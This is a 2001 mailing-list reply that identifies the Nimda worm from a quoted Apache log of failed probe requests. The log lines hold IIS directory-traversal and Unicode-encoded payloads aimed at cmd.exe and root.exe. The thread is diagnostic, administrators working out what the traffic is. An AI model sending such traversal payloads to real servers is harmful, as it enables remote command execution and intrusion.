Re: [SLUG] WHAT is THIS?

From: Russell Hires (rhires@earthlink.net)
Date: Mon Oct 01 2001 - 23:01:57 EDT


I'm thinking this is Nimda. I saw this sort of error message on a Mac
server log file. It had a few other things with it, too, though this log
doesn't show it. This is why Nimda is bad for the internet as a whole:
it probes everything, on port 80 in this case, but I had a sys admin at
the Pasco County School District tell me that he had printers and
various other "net-enabled" devices telling him that they wanted to pass
on this "information" or that they had a port 80. Fortunately, I saw
this on a Mac server, and thought, hmph, that's interesting. The High
School (Wesley Chapel) next door (which runs a Windows network) was
trying to infect us (a Middle School -- Weightman). Also fortunately, it
generated a lot of bad karma for those sys admins at various schools
throughout Pasco Co. Schools that run Windows...

Russell

Patrick Grantham wrote:
>
> Snipped from my httpd log file: The log file is littered with them from IPs
> that appear to be all over the world. Any ideas? I am thankful I am
> running Linux, which would account for 404 errors.
>
> 24.95.6.159 - - [01/Oct/2001:22:05:23 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 293
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 291
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
> 24.95.175.59 - - [01/Oct/2001:22:24:37 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.95.175.59 - - [01/Oct/2001:22:24:37 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315



This archive was generated by hypermail 2.1.3 : Fri Aug 01 2014 - 20:36:10 EDT